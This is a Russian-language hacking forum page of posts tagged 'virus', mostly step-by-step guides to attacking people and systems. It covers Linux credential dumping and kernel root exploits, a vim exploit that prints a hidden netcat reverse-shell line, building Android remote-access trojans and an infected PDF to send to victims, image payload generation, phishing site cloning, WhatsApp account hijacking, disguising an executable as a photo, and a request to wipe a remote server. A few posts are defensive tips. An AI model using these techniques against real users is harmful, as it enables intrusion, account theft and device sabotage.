Новости и объявления.
- Уважаемые гости. При посещении нашего сайта, просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.д. Рекомендуем посетить разделы: "Общение, Коммерческий раздел, Услуги Хакеров и статьи, Отзывы о сайте и пользователях, Черный список" и другие разделы нашего сайта. ***ВНИМАНИЕ*** При обращении за помощью, просим быть внимательными, на сайте есть, как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант сервиса. xakervip.com
Search the Community
Showing results for tags 'вирус'.
-
Пост-эксплуатация в практике пен-теста Пост-эксплуатация (англ. post-explotation) — это то, что можно сделать с целевой системой после того, как удалось найти уязвимость и выполнить какой-то участок кода на целевой системе. Так же под этим термином понимается один из этапов взлома компьютерных систем (фаза) позволяющая собирать дальнейшую информацию о целевой системе, получить дальнейший доступ к сети и хранящимся данным. Фаза пост-эксплуатации позволяет идентифицировать такие вещи, как дополнительные подсети, маршрутизаторы, названия серверов, сетевых служб и установленных приложений. Мы же в материале сделаем акцент на рассмотрение инструментов пост-эксплуатации исключительно под Linux-системы. 1. PXEenum — полное перечисление всего что есть в системе Основной задачей данного скрипта является функция перечисления (англ. Enumeration). Он вытаскивает всю доступную информацию о системе. Данный скрипт создан, если не сказать, что создан для лентяев то для тех, кто ценит свое время. Для запуска он не требует прав root’а, работает в стандартном терминале. # wget //raw.githubusercontent.com/shawnduong/PXEnum/master/PXEnume.sh Установка: # git clone //github.com/shawnduong/PXEnum.git # cd PXEnum/ # chmod +x PXEnum.sh # bash PXEnum.sh 2. MIDA Multitool — палим систему по взрослому Другой интересный инструмент MIDA Multitool созданный на базе менее именитых собратьев SysEnum и RootHelper, но включающий в себя гораздо больший функционал. По воле разработчика функционал MIDA Multitool включает в себя отдельные функции своих предшественников под одним капотом, а именно: SysEnum — Bash скрипт, предназначенный для получения основной информацию о системе, включая, но не ограничиваясь следующими данными — текущий пользователь, IP-конфигурация, таблицы ARP, запущенные процессы и т.д. Roothelper — призван помочь в процессе эскалации привилегий в системе, которая была скомпрометирована, путем выполнения ряда перечислений и использования доверительных сценариев. Устанавливаем скрипт в систему с github: # git clone //github.com/NullArray/Bash-Kit-Multitool # cd Bash-Kit-Multitool # chmod +x bashkit.sh Запускаем скрипт: # /.bashkit.sh Дело сделано! Можно запускать в системе! 3. MimiPenguin — тырим пароли без зазрения совести Очень хорошо известный скрипт в узких кругах пен-тестеров под названием MimiPenguin. основной задачей утилиты служит сброса пароля на вход в систему от текущего пользователя Linux. Если такое сравнение возможно то это аналог утилиты mimikatz для дампа пароля в Windows системах (о ней мы уже рассказывали в одной из наших прошлых статей) Кроме того, MimiPenguin поддерживает такие приложения, как VSFTPd (активные подключения клиента FTP), популярнейший web-сервер Apache2 (активные/старые сеансы HTTP BASIC AUTH, но для этого требуется Gcore) и openssh-сервер (активные подключения SSH с использованием команды sudo). И вообще необходимо сказать, что MimiPenguin часто становится частью эксплойтов под Linux. Устанавливаем MimiPenguin забирая его с репозитория GitHub: # git clone //github.com/huntergregal/mimipenguin # cd mimipenguin # ls –a # chmod +x mimipenguin.sh # ./mimipenguin.sh 4. LARE — ломимся под рута используя баги ядра И напоследок еще один довольно простой скрипт, который помогает с помощью использования известных уязвимостей в ядре ОС получать привилегии root удаленно с атакующей машины. Скрипт использует локальные эксплойты для получения root прав для версий ядра Linux Kernel v2.6-v4.8. Кстати, эта тулза очень часто находит свое применение на пиздатом сертификационном экзамене OSCP. Устанавливаем скрипт в систему: # git clone //github.com/EnigmaDimitri/LARE && cd LARE # chmod +x LARA.sh # LARE.sh -a Запуск скрипта на целевой машине в сети # LARE.sh -l [Attackers-IP] Запуск на машине с подключением к базе данных эксплойтов на GitHub # LARE.sh -l or ./LARE.sh -l Проверка и защита системы от техник пост-эксплуатации Для обеспечения безопасности системы на предмет пост-эксплуатации, по мимо традиционных вариантов защиты как то установка патчей (security patch) и минимизация привилегий, дополнительно существуют специальные тулзы для проверки системы. Ведь в противовес неправильно сложившегося мнения, к пост-эксплуатации не обязательно ведут только 0-day или устаревший софт.
-
Приветствую, хакеры! Многим известно, что запускать неизвестного происхождения файлы небезопасно, но сколько человек при этом открывает незнакомые текстовые файлы, например, в текстовом редакторе? Особенно если это Linux и какой-нибудь проверенным временем текстовый редактор vim/emacs! Что может случиться? Краткое описание недавней уязвимости в vim Не хочу вдаваться в технические подробности дырки, которую нашли в текстовом редакторе vim, об этом написано немало статей (уязвимости присвоен номер CVE-2019-12735), но хочу рассказать о том, какую опасность это несёт и почему надо быть предельно аккуратным даже с такими, казалось бы, базовыми инструментами. Вектор атаки: вам присылают файлик, вы его открываете в vim, а тем временем у вас на компьютере выполняется код. Например, качается с удаленного сервера бекдор и устанавливается в систему. Причем вы даже не видите целиком содержимого файла, вся выполняемая конструкция замаскирована и не отображается. Демонстрация экслоита Рассмотрим один из экслоитов для vim. $ wget https://raw.githubusercontent.com/numirias/security/master/data/2019-06-04_ace-vim-neovim/shell.txt А теперь попробуем его прочитать, например, утилитой cat: $ cat shell.txt Nothing here. А вот что в файлике находится на самом деле: $ cat -v shell.txt [?7l SNothing here. :silent! w | call system('nohup nc 127.0.0.1 9999 -e /bin/sh &') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails('set\ fde=x\ \|\ source\!\ \%') fdl=0: [1G [KNothing here." [D То есть вы качаете незнакомый файлик, открываете его в уязвимом текстовом редакторе и у вас открывается шелл на 9999-порту и делай дальше с вашей машиной что хочешь. Вывод Открытие незнакомых текстовых файлов даже в текстовых редакторах может быть опасным. Если вы не доверяете источнику, с которого скачен файл, лучше запустить его в изолированном окружении вроде виртуальной машины, или тестовой vps. Как вариант — добавьте в ваш шелл (например, ~/.zshrc) следующий alias, чтобы хоть как-то обнаружить возможную маскировку шелл-кода в незнакомом файле. При условии что это не эксплоит к утилите cat, или терминалу. alias cv='cat -v' Ну и конечно же не забывайте обновлять всё ПО и ОС на всех ваших девайсах. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как вы можете обнаружить и уничтожить вирусы удаленного доступа. Как известно, антивирусы не всегда палят вредоносы, а полное удаление вируса тоже не всегда помогает. Поэтому воспользуемся командной строкой и узнаем, управляет ли кто-то нашей системой помимо нас. Итак, приступим 1. Открываем командную строку от имени администратора; 2. Переходим в директорию нашего юзера с помощью команды cd C:\Users\Имя вашего профиля; 3. Далее прописываем команду netstat -b; 4. У нас появятся все активные подключения ваших программ, а также их IP адреса. Если видим незнакомый процесс, то гуглим информацию по нему. Если убедились, что это вредонос, тогда прописываем следующие команды: netstat -nbo taskkill /pid PID ВАШЕГО ФАЙЛА /F 4. Поздравляю, вы великолепны! Если вы обнаружили вирус, вы также увидите IP адрес прокси-сервера, через который он имеет доступ к вашему ПК, а значит сможете как-то воздействовать на него, тем самым еще сильнее укрепив свою позицию. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! В данной небольшой статье я хочу рассказать о том, как взломать и управлять смартфоном удаленно. AhMyth RAT - это приложение с открытым исходным кодом, доступное только в бета-версии. Инструмент нацелен на пользователей Windows, но шрифты AhMyth также можно загрузить с GitHub для UNIX-подобных платформ, отмечают эксперты по мобильному взлому. Установка: Устанавливаем Java Скачиваем AhMyth RAT Создаём вредоносный APK: Чтобы создать файл APK для Android, откройте вкладку APK Builder. В поле IP-адреса источника необходимо ввести IP-адрес атакующей машины. В поле Source port вы можете указать порт, который машина зарезервирует для прослушивания соединений (порт по умолчанию - 42,474). Затем нажмите кнопку «Создать»; по умолчанию зараженный файл сохраняется в следующей папке: C:UsersAhMythOutput Готово! Теперь осталось отправить жертве данный APK файл. Вот таким простым способом вы можете взломать и получить полный доступ над каким-либо смартфоном, поэтому пользуйтесь пока данный метод работает. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как можно взломать и получить удаленный доступ к телефону. AhMyth RAT - это приложение с открытым исходным кодом, доступное только в бета-версии. Инструмент нацелен на пользователей Windows, но шрифты AhMyth также можно загрузить с GitHub для UNIX-подобных платформ, отмечают эксперты по мобильному взлому. Установка: Устанавливаем Java Скачиваем AhMyth RAT Создаём вредоносный APK: Чтобы создать файл APK для Android, откройте вкладку APK Builder. В поле IP-адреса источника необходимо ввести IP-адрес атакующей машины. В поле Source port вы можете указать порт, который машина зарезервирует для прослушивания соединений (порт по умолчанию - 42,474). Затем нажмите кнопку «Создать»; по умолчанию зараженный файл сохраняется в следующей папке: C:\Users\ваш_юзер>\AhMyth\Output Готово! Теперь осталось отправить жертве данный APK файл. Это отличный и эффективный способ для взлома любого телефона на базе Android. Кроме того, с помощью него очень удобно управлять устройством удаленно. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как можно взломать ПК при помощи PDF-файла. Так как данный формат имеет множество уязвимостей, в него легко можно "вшивать" различное вредоносное программное обеспечение. Сегодня же мы будем применять автоматизированный фреймворк Insanity Framework, который позволяет создать зараженный PDF-файл, позволяющий реализовать удаленный доступ к ПК под управлением систем Windows. Погнали! 1. Для установки используем: git clone https://github.com/4w4k3/Insanity-Framework $ cd Insanity-Framework $ chmod +x insanity.py $ ./install.sh 2. Для использования нужно ввести следующую команду: sudo python2 insanity.py В момент первого запуска устанавливаются все необходимые зависимости и открывается главное меню. В главном меню нужно выбрать первый пункт, который позволяет создавать полезную нагрузку. Затем нужно выбрать Fake Acrobat PDF. Ввести ip адрес и порт. Это отличный и эффективный метод взлома практически любого компьютера, а самое главное, что при должной сноровке он становится очень трудно обнаружимым. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! В данной статье я хочу рассказать, почему необходимо оперативно проверять определенные файлы на вредоносное ПО. Ведь, во время серфинга в интернета и поиска нужно информации часто появляются сомнительные и ненадежные ресурсы. В ситуации когда на компьютере отсутствует антивирус полезно проверять мелкие файлы на наличие вирусов. Мало того, что использование подобных сервисов позволяет проверить вирусы по множеству различных баз данных, но также вы можете сделать это быстро и эффективно, не тратя огромное количество времени на полное сканирование компьютера. VirusTotal.com — облачная проверка файлов на вирусы. Основное преимущество сервиса в том, что проверка проходит сразу в нескольких антивирусах, что дает максимально широкую картину о безопасности файла. Подходит для оперативного анализа файла, не более. Компания заботится о своем продукте, сервис абсолютно бесплатен, регулярные обновления баз и миллионы пользователей по всему миру. Работать может со ссылками, файлами и анализировать даже страницу сайта. Ссылка - http://VirusTotal.com Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! Перед вами очень полезный лайфхак на все случаи жизни. Флэшки в моде при любой погоде. 1. Переходим в «Этот компьютер» → кликаем ПКМ по иконке флешки → нажимаем «Форматировать». 2. На вкладке «Файловая система» выбираем NTFS → в блоке «Способы форматирования» ставим галочку перед «Быстрое (очистка оглавления)» → нажимаем «Начать». └ Форматирование уничтожит все данные на флешке. 3. Заходим на флешку → создаем папку с любым названием → возвращаемся обратно в «Этот компьютер». 4. Кликаем ПКМ по иконке флешки → заходим в «Свойства» → переходим на вкладку «Безопасность» → нажимаем «Изменить». 5. Убираем галочки перед всеми пунктами, кроме «Список содержимого папки» и «Чтение» → нажимаем «Применить». └ Готово! Флешка «в домике»: файлы ни скопировать, ни создать, ни переименовать, но это не конец! Сейчас носитель заблокирован полностью: загрузить файлы не может даже владелец. Needs repairing! 6. Кликаем ПКМ по созданной на флешке папке (см. пункт 3) → выбираем «Свойства» → переходим на вкладку «Безопасность» → нажимаем «Изменить»; 7. Ставим галочку перед пунктом «Полный доступ» → нажимаем «Применить»; 8. Поздравляю, вы великолепны! Так мы открыли возможность переносить файлы в папку: чтобы использовать носитель по назначению. Примечание: именно в папку! В сам корень флешки ничего скопировать нельзя. А вот в папку — welcome! Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! В данной небольшой статье я хочу с вами поделиться облачным пакетом удалённого управления Android под названием L3MON. L3MON - это облачный пакет для удалённого управления Android. Установка: $ apt install nodejs npm $ npm install pm2 -g $ git clone https://github.com/D3VL/L3MON.git Использование: $ cd L3MON $ cd server $ npm install $ npm audit fix $ pm2 start index.js $ pm2 startup Теперь вам нужно изменить пароль на шифрование хэша MD5 и поместить его в файл конфигурации для защиты панели администратора. Вы можете изменить пароль в соответствии с приведенной ниже командой. $ echo -n "12345" | md5sum $ nano maindb.json Запустите localhost на браузере и введите имя пользователя «admin» и пароль «12345». Создайте APK вирус и отправьте её жертве. После того жертва запустить ваш вирус, у вас на localhost появится его устройство со всеми функциями доступа. Отличный метод взлома смартфона на Android. У этого способа есть огромный потенциал, а самое главное, что вам не потребуется огромного количества навыков, чтобы начать изучать подобный взлом. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! В данной статье я хочу рассказать о том, как можно сломать телефон при помощи простой Fork-бомбы. Fork-бомба — вредоносная или ошибочно написанная программа, бесконечно создающая свои копии. Выполнение такой программы вызывает большую нагрузку вычислительной системы или даже отказ в обслуживании вследствие нехватки системных ресурсов. Для начала обновляем пакеты Termux: pkg update && pkg upgrade Устанавливаем все необходимые библиотеки: pkg install git Далее клонируем инструмент с репозитория GitHub: git clone https://github.com/Terror696/Vitus2.0 Переходим в директорию инструмента: cd Vitus2.0 В директории будет находится файл VirtualXposed.apk, который можно переместить во внутреннюю память телефона: cp VirtualXposed.apk /sdcard/ Теперь осталось предать данный файл целевому пользователю, и под любым предлогом заставить нашу жертву запустить его. Это очень простой и очень мощный способ выведения из строя любого смартфона. Поэтому рекомендую быть очень аккуратным при его использовании. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! В данной статье я хотел бы поделиться вам с данным списком необходимых онлайн ресурсов, благодаря которым ты можешь проверить любой файл, полученный из недостоверного источника. А так же другой дополнительный материал, с помощью которого ты обезопасишь себя от фишинга. Советую всегда пользоваться данным ресурсами, так ты сможешь быть всегда в безопасности и быть уверенным в том, чем ты пользуешься. • Дешифроторы коротких URL-ссылок для проверки на фишинговый сайт: http://www.untinyurl.com http://checkshorturl.com https://unshorten.me/ • Онлайн песочницы: https://threatpoint.checkpoint.com/ThreatPortal/emulation http://www.cpcheckme.com/checkme https://www.hybrid-analysis.com https://cuckoo.cert.ee https://any.run • Онлайн-антивирусы: https://www.virustotal.com/ru/ https://online.drweb.com/ • Проверка анонимности web-серфинга: https://proxy6.net/privacy http://proiptest.com/test/ Это наименьшее, что вы можете сделать для своей безопасности, но это уже будет большим плюсом. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! Каждому из нас приходилось прибегать к помощи самозагружающихся дисков и USB-флешек. Случился ли сбой основной ОС, или понадобилось воспользоваться чужим ПК, выручит флешка с собственной операционной системой или инсталлятором ОС. Однако, если у тебя есть смартфон, флешка больше не нужна. С задачей загрузки ОС он справится сам. DriveDroid превращает смартфон в самозагружаемую флешку, которая будет запускать на подключенном компьютере любой указанный образ диска, будь то Windows, Linux или еще более экзотическая ОС. Это отличный инструмент для решения проблем, переустановки ОС и возможность всегда иметь под рукой собственную альтернативную ОС. Использовать DriveDroid просто. Он не требует заранее искать и скачивать образы или обладать какими-то техническими знаниями. Все необходимое приложение сделает само, но для начала ему надо пройти инициализацию и определить, совместим ли технически смартфон с функцией загрузки ОС на ПК. Сразу после установки DriveDroid предложит определить техническую возможность и активировать нужный режим работы. Для этого приложению необходимо предоставить права root и подключить смартфон кабелем к компу. Даем права root и подключаем кабель, затем DriveDroid предложит выбрать предпочтительный метод работы. Standard Android работает в большинстве случаев. На последнем этапе надо указать, какой именно тип носителя ты увидел на компе: USB, CD-ROM или никакого. Это легко проверить через проводник. Выбираем метод работы и тип носителя, затем следует перезагрузить комп и попробовать загрузиться со смартфона. Если все прошло гладко, можешь начинать скачивать образы нужных дистрибутивов Linux прямо из приложения (от минималистичного SliTaz размером 35 Мбайт до полноценного Ubuntu). Впоследствии с каждого из них можно будет загрузиться, нажав на имени нужного образа, выбрать тип носителя (USB или CD), подключить смартфон кабелем и перезагрузить комп. Можно загрузить и Windows. Для этого необходимо скачать ISO-образ, положить его на SD-карту смартфона (или во внутреннюю память, если смартфон не поддерживает карточки) и затем выбрать его при добавлении новой ОС в DriveDroid
-
Приветствую, хакеры! Когда-то стали известны способы размещения вредоносного кода в изображении. Немногим позднее появилась атака Polyglot, когда вредоносный файл одновременно является изображением и JavaScript-кодом. В основном, это касалось файлов BMP, при этом 2 первых байта представляли 16-ричное представление символов ВМ в изображении ВМP. Далее,4 байта отвечают за размер, затем 4 нулевых байта и байты, отвечающие за смещение данных. При выполнении техники Polyglot, контролируется размер изображения, а 16-ричные символы представляются так, чтобы компьютерами интерпретировались иначе. Т.е., чтобы выполнялись как код. Соответственно, появился генератор полезной нагрузки Pixload, который создал Alexandr Savca (chinarulezzz). И который представляю Вашему вниманию. Pixload умеет сгенерировать нагрузку в файлах BMP, GIF, JPG и PNG. Работает он как с дефолтными файлами, которые прилагаются в его директории, так и может начинять небольшие произвольные файлы соответствующего формата. В отличии от других аналогичных техник, файлы не требуется конвертировать в иконки и т.п. Если кому потребуется начинка из shell-кода х86 как в старые добрые времена, то смотрим здесь и здесь Другие полезные ссылки для информации Вы найдёте на странице автора Вся информация предоставлена исключительно в рамках ознакомления и изучения проблем информационной безопасности. Категорически запрещается применение рассматриваемого инструмента в незаконных целях. Установка: # apt install libgd-perl libimage-exiftool-perl libstring-crc32-perl # git clone https://github.com/chinarulezzz/pixload.git # cd pixload Использование: Если работать с дефолтными данными и произвольный выходной файл отсутствует, то при следующем генерировании, такой файл перезапишется. Если имеется скачанный произвольный выходной файл, то указываем на выходе его название и нагрузка запишется в него. Для удобства поместите такой файл в директорию инструмента. 1) Для файлов BMP # ./bmp.pl -output file.bmp 2) Для JPG 2 вида нагрузки, либо в параметр COMMENT, либо DQT table И именно для данного типа файлов существует лимитирование нагрузки в 64 байта и требование, чтобы файл был произвольным. ./jpg.pl -place DQT -output file.jpg ./jpg.pl -place COM -output file.jpg 3) Для PNG # ./png.pl -output file.png 4) Для GIF # ./gif.pl -output file.gif Вот пример изображения После генерирования полезной нагрузки, размер в свойствах останется неизменным, но само изображение примет минимальный размер. Опасность такие файлы представляют для посетителей ресурсов, у которых, особенно присутствует XSS-уязвимость. Например, находятся вот таким способом уязвимые ресурсы по доркам. Наличие уязвимости позволяет даже себя любимого вывести на главную страницу. Загружаются файлы если это позволяется и выполняется атака через браузеры при взаимодействии с файлом. Мы конечно не станем ничего никуда грузить и заниматься вредительством. Защитой от подобной атаки служит по-прежнему контроль javascript в браузере за счёт дополнений. И при изучении файла hex-редактором, а лучше, анализатором пакетов, можно сразу увидеть, что с файлом что-то не так и виден в нём скрипт. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! Когда-то стали известны способы размещения вредоносного кода в изображении. Немногим позднее появилась атака Polyglot, когда вредоносный файл одновременно является изображением и JavaScript-кодом. В основном, это касалось файлов .BMP, при этом, 2 первых байта представляли 16-ричное представление символов ВМ в изображении ВМP. Далее, 4 байта отвечают за размер, затем 4 нулевых байта и байты, отвечающие за смещение данных. При выполнении техники Polyglot, контролируется размер изображения, а 16-ричные символы представляются так, чтобы компьютерами интерпретировались иначе. Pixload умеет сгенерировать нагрузку в файлах BMP,GIF,JPG и PNG . Работает он, как с дефолтными файлами, которые прилагаются в его директории, так и может начинять небольшие произвольные файлы соответствующего формата. В отличии от других аналогичных техник, файлы не требуется конвертировать в иконки и т.п. Установка: # apt install libgd-perl libimage-exiftool-perl libstring-crc32-perl # git clone https://github.com/chinarulezzz/pixload.git # cd pixload Использование: Если работать с дефолтными данными и произвольный выходной файл отсутствует, то при следующем генерировании - такой файл перезапишется. Если имеется скачанный произвольный выходной файл, то указываем на выходе его название, и нагрузка запишется в него. Для удобства поместите такой файл в директорию инструмента. Для файлов BMP # ./bmp.pl -output file.bmpДля JPG 2 вида нагрузки,либо в параметр COMMENT, либо DQT tableИ именно для данного типа файлов существует лимитирование нагрузки в 64 байта и требование,чтобы файл был произвольным. # ./jpg.pl -place DQT -output file.jpg # ./jpg.pl -place COM -output file.jpg 3) Для PNG # ./png.pl -output file.png4) Для GIF # ./gif.pl -output file.gifПосле генерирования полезной нагрузки, размер в свойствах останется неизменным, но само изображение примет минимальный размер. Сам процесс можно видеть на скриншоте: Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! Да, фишинг всё ещё актуален и будет оставаться таковым и в 2021 году. RevoltShing - это достаточно хороший инструмент для осуществления фишинг-атаки. Данная утилита способна скопировать практически любой сайт. Из плюсов могу подчеркнуть приятное оформление, а также после ввода данных жертва попадает на оригинальную страницу сайта. Установка: 1. Устанавливаем репозиторий GitHub: git clone https://github.com/AngelSecurityTeam/RevoltShing 2. Переходим в директорию утилиты и устанавливаем компоненты: cd RevoltShing pip install requests pip install bs4 pip install whether Запуск: python Server.py python revoltshing.py Установка завершена. Но на этом не всё, вот дальнейший небольшой мануал: система по стандарту предложит клонировать сайт Банка Америки. Поменять настройки можно командой: edit url https:// Перенаправление меняется командой: edit url_destination https:// Для старта вписываем: start Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! Исследователи обнаружили новый способ, который позволяет сформировать цифровой отпечаток пользователя, не только в популярных браузерах вроде Chrome и Firefox, но и в Tor. Суть способа в том, что он перебирает протоколы для запуска приложений на стороне пользователя, и в зависимости от набора установленных - формирует идентификатор. Так, идентификатор, присваиваемый пользователю данным методом, в большинстве случаев уникален для каждого компьютера - а значит, с его помощью можно связать воедино цифровые образы из нескольких отдельных браузеров одного и того же пользователя. Убедитесь в этом сами: Исследователь создал скрипт, который пытается запустить различные программы из браузера (например, используя URL-адрес zoommtg://, предлагающий браузеру запустить клиент Zoom), после чего исходя из полученной информации об установленных программах присваивает вам идентификатор. И хотя сейчас метод формирует идентификатор на основании только 24 программ, список может быть увеличен. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры. Иногда пользователю по тем или иным причинам необходимо закрыть доступ в Интернет в Windows 10 для определенного ПО. Например, подобное решение нужно родителям, которые не против, чтобы дети проводили время в глобальной сети, но категорично настроены против того, чтобы они играли в онлайн-игры. Подобное действие можно осуществить как при помощи сторонних приложений, так и встроенными инструментами. Учитывая, что рядовым пользователям не хочется разбираться в сложных приложениях, где нужно множество действий для ограничения доступа в Инет, рассмотрим имеющуюся утилиту в Windows 10 — «Брандмауэр». Для осуществления поставленной задачи необходимо выполнить несколько шагов 1. Наберите в строке поиска «Панель управления», после чего кликните по одноименному пункту в результатах выдачи. 2. В новом окне, в графе «Просмотр», выберите из всплывающего меню «Крупные» или «Мелкие» значки. 3. Когда содержимое в окошке изменится, отыщите ссылку «Брандмауэр защитника Windows» и перейдите по ней. 4. Слева найдите и нажмите на «Дополнительные параметры». 5. В левом столбце выберите «Правила для исходящего подключения», а затем в правом «Создать правило». 6. В отображенном окошке оставьте значение по умолчанию «Для программы» и кликните «Далее». 7. Укажите путь к исполняемому файлу приложения, используя кнопку «Обзор…», либо просто его скопируйте и вставьте в соответствующую строчку. Примечание: если не можете отыскать место, где именно расположен данный файл программы, но на рабочем столе имеется его ярлык, кликните по нему ПКМ, после чего выберите «Свойства» и в отображенном окне, в графе «Объект», будет прописан его путь. 8. На следующем этапе, чтобы наверняка заблокировать доступ и не мучиться с выбором сетей, просто установите галочки на всех отображенных пунктах. 9. Далее остается лишь указать имя данного правила для его быстрого поиска (например, если их было создано множество, то отыскать одно из них, вбивая непонятные названия, весьма проблематично) и кликнуть по кнопке «Готово». После этого при запуске приложения будет отображаться сообщение, что соединение с сетью Интернет отсутствует. Если же от подобного правила необходимо избавиться, его таким же образом можно удалить. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! В этой статье я покажу, как взломать WhatsApp Web через вредоносный html-файл. Первое, что нам необходимо сделать - это создать вредоносный html-файл с предварительным изображением: Веб-клиент WhatsApp сохраняет разрешенные типы документов в клиентской переменной W ["default"]. DOC_MIMES Эта переменная хранит допустимые типы Mime, используемые приложением. Поскольку зашифрованная версия документа отправляется на серверы WhatsApp, в эту переменную можно добавить новый тип Mime, такой как «text / html», чтобы обойти ограничение клиента и загрузить вредоносный HTML-документ После добавления URL-адреса вредоносного документа в клиентскую переменную клиент шифрует содержимое файла с помощью функции encryptE2Media, а затем загружает его зашифрованным как BLOB на сервер WhatsApp Более того, изменение имени и расширения документа и создание фальшивого предварительного просмотра путем изменения клиентских переменных сделает вредоносный документ более привлекательным для жертвы. Это результат: А вот, как это будет работать: как только жертва нажимает на файл, она увидит смешную кошку под объектом blob, которая является объектом html5 FileReader под web.whatsapp.com. Это означает, что мы с тобой можем получить доступ к ресурсам в браузере под web.whatsapp.com: Просто просмотрев страницу, не нажимая ни на что, данные локального хранилища жертвы будут отправлены прямиком в наши руки, что позволит нам получить его учетку. А теперь мы создадим функцию JavaScript, которая каждые 2 секунды будет проверять, есть ли в бэкэнде новые данные, и подменять локальное хранилище жертвы. Вот часть этого кода: Теперь мы будем перенаправлены на акк жертвы и можем получить к нему доступ. Веб-сайт WhatsApp не позволяет клиенту иметь более одного активного сеанса за один раз, поэтому после того, как мы украли учетку жертвы, она получит следующее сообщение: Давай немного модернизируем наш JavaScript код добавив туда следующие строки: Это код, который заставит окно браузера жертвы лагать и позволит нам управлять учетной записью без помех. Мы будем подключены к акку жертвы до тех пор, пока жертва снова не войдет в учетную запись. Закрытие браузера не приведет к нашему выходу из учетки жертвы, и мы сможем войти в учетную запись столько, сколько захотим. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации
-
Для того,чтобы успешно замаскировать вирус и жертва ни о чём не догадывалась нам понадобится архив с программами скачать архив: https://yadi.sk/d/vnR20niXmQrUCA Распакуйте архив куда-нибудь и закиньте все файлы в пустую папку,дальше нам понадобится иконка.ico ,сама фотка.jpg и вирус.exe кидаем их в эту же папку Вот онлайн конвертер картинок в иконки: http://image.online-convert.com/ru/convert-to-ico После всех этих махинаций папка должна быть наполнена,как на картинке: Дальше начинается процесс маскировки : 1) Открываем папку Collection_OCX и находим в этой папке файл Registrator.OCX.exe открываем его,затем нажимаем Register Всё дело дойдёт до конца,но может быть пару ошибок это нормально! 2) Далее возвращаемся в папку с файлами,которые хотим замаскировать ,выделяем файл .exe и файл .jpg и жмём правой кнопкой мыши по файлам , далее выбираем WinRar ,затем добавить в архив ,ставим галочку создать SFX-архив и метод сжатия выбираем максимальный! Дальше идём в раздел "Дополнительно" и выбираем Параметры SFX здесь мы указываем путь для распаковки наших файлов там,где будет картинка и там ,где будет вирус В разделе установка нам нужно полностью скопировать название файла .jpg ,например : "name-hackcom.jpg" жмём пробел и на следующей строчке пишем название нашего файла .exe полностью! Дальше во вкладке режимы мы ставим "Скрыть всё" В разделе обновление мы выбираем везде пункт номер 2 : Теперь направляемся в раздел "Текст и графика" теперь нам то и потребуется иконка В разделе загрузить значок SFX из файла нажимаем обзор и выбираем иконку из нашей папки ,нажимаем окей и создаём архив. У наc в папке появился файл архива .exe Теперь мы будем избавлять от расширения .exe ,открываем Neanderthal.exe Нажимаем File и выбираем файл ,который мы будем криптовать в нашем случае это заранее сделанный архив ,а в графе Extension выбираем любое расширение ,в которое Вам нужно переделать файл ,выбираем .jpg и жмём Change Extension И у нас в папке появился новый файл exe.jpg12345 или же название ,которое было у Вас ,цифры можно стереть и оставить просто exe.jpg ,дальше перед exe приписываем любое название ,например : "kaptinkaexe.jpg" Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Задача. Где-то удаленно есть сервер. На котором есть всякое. Его надо отформатировать, чтоб убить там всё. Всё что есть для доступа на этот сервер – это некая игра, которая работает в клиент-серверном варианте (и соответственно у вас есть только ее клиентская часть, а серверная стоит на этом сервере). Детали напишу уже при обсуждении. Если отформатировать сервер проблематично, то готов обсудить другие варианты вывода из строя необходимого ресурса. Для связи пишите в личные сообщения. Буду рад, если всё удастся.
-
Для начала устанавливаем последнюю версию geckdriver по ссылке: https://github.com/mozilla/geckodriver/releases После установки вводим следующие команды: mv -f geckodriver /usr/local/share/geckodriver ln -s /usr/local/share/geckodriver /usr/local/bin/geckodriver ln -s /usr/local/share/geckodriver /usr/bin/geckodriver Далее клонируем инструмент с репозитория GitHub: git clone https://github.com/OWASP/QRLJacking Переходим в директорию инструмента: cd QRLJacking/QRLJacker Устанавливаем зависимости: python -m pip install -r requirements.txt И запускаем инструмент: python QrlJacker.py Перед нами отроется меню инструмента, где мы создаем ссылку на вредоносный QR-код для кражи WhatsApp: use grabber/whatsapp set set port 1337 run Инструмент сгенерирует ссылку на страницу с вредоносным QR-кодом, ссылку на которую можно получить с помощью команды: jobs Данная ссылка будет работать в локальной сети. Для того, чтобы сделать ее общедоступной, можно воспользоваться ngrok. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
